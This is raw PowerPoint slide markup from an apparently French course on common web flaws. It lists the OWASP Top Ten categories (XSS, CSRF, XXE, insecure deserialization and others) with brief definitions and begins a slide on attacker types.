        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C3DB2ADC-AF19-4574-8C10-79B5B04FCA27}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>65</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="69073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590F21-A5BA-477C-9A35-42D4375D745E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="700635" y="922096"/>
            <a:ext cx="10691265" cy="1016432"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Failles communes – OWSAP Top TEN</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Top 10 Web Application Security Risks</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Espace réservé du contenu 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8B945736-D24E-4303-8E49-555FA194C19F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="700635" y="1938528"/>
            <a:ext cx="10691265" cy="4289642"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="4"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1900" b="1" strike="sngStrike" dirty="0"/>
              <a:t>XML Entités externes (XXE)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1500" strike="sngStrike" dirty="0"/>
              <a:t>De nombreux processeurs XML anciens ou mal configurés évaluent les références aux entités externes dans les documents XML.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="4"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1900" b="1" dirty="0"/>
              <a:t>Broken Access Control</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1500" dirty="0"/>
              <a:t>Les restrictions sur ce que les utilisateurs authentifiés sont autorisés à faire ne sont souvent pas correctement appliquées. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="4"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1900" b="1" dirty="0"/>
              <a:t>Security </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1900" b="1" dirty="0" err="1"/>
              <a:t>Misconfiguration</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1900" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1500" dirty="0"/>
              <a:t>La mauvaise configuration de la sécurité est le problème le plus fréquemment rencontré. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Espace réservé du numéro de diapositive 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{41F4EC6A-70FF-4B67-8ED3-0994A153E305}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C3DB2ADC-AF19-4574-8C10-79B5B04FCA27}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>66</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="167644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590F21-A5BA-477C-9A35-42D4375D745E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="700635" y="922096"/>
            <a:ext cx="10691265" cy="1016432"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Failles communes </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>– OWASP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Top TEN</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Top 10 Web Application Security Risks</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Espace réservé du contenu 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8B945736-D24E-4303-8E49-555FA194C19F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="700634" y="1938528"/>
            <a:ext cx="10691265" cy="4904866"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="40000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="7"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="3000" b="1" dirty="0"/>
              <a:t>Cross-Site Scripting XSS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="2700" dirty="0"/>
              <a:t>Les failles XSS se produisent lorsqu'une application inclut des données non fiables dans une nouvelle page Web sans validation ou échappement approprié, ou met à jour des données fournies par l'utilisateur en utilisant une API en HTML ou en JavaScript. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="7"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="3400" b="1" u="sng" dirty="0"/>
              <a:t>Cross Site </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="3400" b="1" u="sng" dirty="0" err="1"/>
              <a:t>Request</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="3400" b="1" u="sng" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="3400" b="1" u="sng" dirty="0" err="1"/>
              <a:t>Forgery</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="3400" u="sng" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="3400" b="1" u="sng" dirty="0"/>
              <a:t>CSRF</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="3200" b="1" u="sng" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="7"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="3400" b="1" u="sng" dirty="0"/>
              <a:t>Local </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="3400" b="1" u="sng" dirty="0" err="1"/>
              <a:t>Remote</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="3400" b="1" u="sng" dirty="0"/>
              <a:t> File Inclusion RFI</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="7"/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="3000" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="7"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="3000" b="1" dirty="0" err="1"/>
              <a:t>Insecure</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="3000" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="3000" b="1" dirty="0" err="1"/>
              <a:t>Deserialization</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="3000" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="2700" dirty="0"/>
              <a:t>Une désérialisation non sécurisée conduit souvent à l'exécution de code à distance.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="2700" dirty="0" err="1"/>
              <a:t>Hashage</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2700" dirty="0"/>
              <a:t> des mots de passe.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="2700" dirty="0"/>
              <a:t>Exemple NTCS JS. (les contrôles en JS peuvent être désactivés). Mais il faut les mettre quand même, pourquoi ?</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="7"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0"/>
              <a:t>Using Components with Known Vulnerabilities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="2700" dirty="0"/>
              <a:t>Les composants, tels que les bibliothèques, les </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2700" dirty="0" err="1"/>
              <a:t>frameworks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2700" dirty="0"/>
              <a:t> et autres modules logiciels, s'exécutent avec les mêmes privilèges que l'application.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="7"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="3000" b="1" dirty="0" err="1"/>
              <a:t>Insufficient</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="3000" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="3000" b="1" dirty="0" err="1"/>
              <a:t>Logging</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="3000" b="1" dirty="0"/>
              <a:t> &amp; Monitoring</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="2700" dirty="0"/>
              <a:t>Une journalisation et une surveillance insuffisantes, associées à une intégration manquante ou inefficace avec la réponse aux incidents</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="2700" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="7"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="3000" u="sng" dirty="0"/>
              <a:t>Attaque par force brute et dictionnaire</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" sz="3000" u="sng" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR" sz="3000" dirty="0"/>
              <a:t>Utilisation des mots de passes les plus courants ou issus de base de données piratée</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Espace réservé du numéro de diapositive 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{41F4EC6A-70FF-4B67-8ED3-0994A153E305}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C3DB2ADC-AF19-4574-8C10-79B5B04FCA27}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>67</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="49180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animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="47" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3">
                                            <p:txEl>
                                              <p:pRg st="13" end="13"/>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14" end="14"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="50" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3">
                                            <p:txEl>
                                              <p:pRg st="14" end="1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animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="55"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7283CDA-0823-4DC2-A7C7-6518D3C32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781" y="3253018"/>
            <a:ext cx="1936924" cy="1936924"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Espace réservé du numéro de diapositive 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BA333C9F-A327-460C-92C6-10B36427E183}"/>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68</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Titre 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{895571CE-FB1A-4DF5-B693-B3417720F98D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="897754"/>
            <a:ext cx="12192000" cy="1049380"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Failles communes – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Les différents types d’attaquant</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="10" name="Group 74">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B69AB879-205A-412F-9273-8A7F5A0262C7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm flipH="1">
            <a:off x="6273311" y="1878953"/>
            <a:ext cx="5930089" cy="1296050"/>
            <a:chOff x="0" y="1409269"/>
            <a:chExt cx="5918688" cy="1305074"/>
          </a:xfrm>
          <a:solidFill>
            <a:srgbClr val="2AB59F"/>
          </a:solidFill>
          <a:effectLst>
            <a:outerShdw blurRad="63500" sx="102000" sy="102000" algn="ctr" rotWithShape="0">
              <a:prstClr val="black">
                <a:alpha val="40000"/>
              </a:prstClr>
            </a:outerShdw>
          </a:effectLst>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="Rectangle 10">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3DA7D1F6-70AE-43C5-9E9B-F7FBA7B16840}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="1409269"/>
              <a:ext cx="4030249" cy="654374"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="76ABDC"/>
            </a:solidFill>
            <a:ln>
              <a:solidFill>
                <a:srgbClr val="76A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31506C"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="12" name="Arrow: Left 1">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F94A361B-2BF0-4730-8773-1D293FA36DD2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="13391102">
              <a:off x="3010476" y="1616585"/>
              <a:ext cx="2908212" cy="1097758"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 0 w 2216226"/>
                <a:gd name="connsiteY0" fmla="*/ 548879 h 1097758"/>
                <a:gd name="connsiteX1" fmla="*/ 859007 w 2216226"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 1097758"/>
                <a:gd name="connsiteX2" fmla="*/ 859007 w 2216226"/>
                <a:gd name="connsiteY2" fmla="*/ 226725 h 1097758"/>
                <a:gd name="connsiteX3" fmla="*/ 2216226 w 2216226"/>
                <a:gd name="connsiteY3" fmla="*/ 226725 h 1097758"/>
                <a:gd name="connsiteX4" fmla="*/ 2216226 w 2216226"/>
                <a:gd name="connsiteY4" fmla="*/ 871033 h 1097758"/>
                <a:gd name="connsiteX5" fmla="*/ 859007 w 2216226"/>
                <a:gd name="connsiteY5" fmla="*/ 871033 h 1097758"/>
                <a:gd name="connsiteX6" fmla="*/ 859007 w 2216226"/>
                <a:gd name="connsiteY6" fmla="*/ 1097758 h 1097758"/>
                <a:gd name="connsiteX7" fmla="*/ 0 w 2216226"/>
                <a:gd name="connsiteY7" fmla="*/ 548879 h 1097758"/>
                <a:gd name="connsiteX0" fmla="*/ 0 w 2908212"/>
                <a:gd name="connsiteY0" fmla="*/ 548879 h 1097758"/>
                <a:gd name="connsiteX1" fmla="*/ 859007 w 2908212"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 1097758"/>
                <a:gd name="connsiteX2" fmla="*/ 859007 w 2908212"/>
                <a:gd name="connsiteY2" fmla="*/ 226725 h 1097758"/>
                <a:gd name="connsiteX3" fmla="*/ 2908212 w 2908212"/>
                <a:gd name="connsiteY3" fmla="*/ 221698 h 1097758"/>
                <a:gd name="connsiteX4" fmla="*/ 2216226 w 2908212"/>
                <a:gd name="connsiteY4" fmla="*/ 871033 h 1097758"/>
                <a:gd name="connsiteX5" fmla="*/ 859007 w 2908212"/>
                <a:gd name="connsiteY5" fmla="*/ 871033 h 1097758"/>
                <a:gd name="connsiteX6" fmla="*/ 859007 w 2908212"/>
                <a:gd name="connsiteY6" fmla="*/ 1097758 h 1097758"/>
                <a:gd name="connsiteX7" fmla="*/ 0 w 2908212"/>
                <a:gd name="connsiteY7" fmla="*/ 548879 h 109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8212" h="1097758">
                  <a:moveTo>
                    <a:pt x="0" y="548879"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="859007" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="859007" y="226725"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2908212" y="221698"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2216226" y="871033"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="859007" y="871033"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="859007" y="1097758"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="548879"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="B9D4ED"/>
            </a:solidFill>
            <a:ln>
              <a:solidFill>
                <a:srgbClr val="B9D4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31506C"/>
                </a:solidFill>
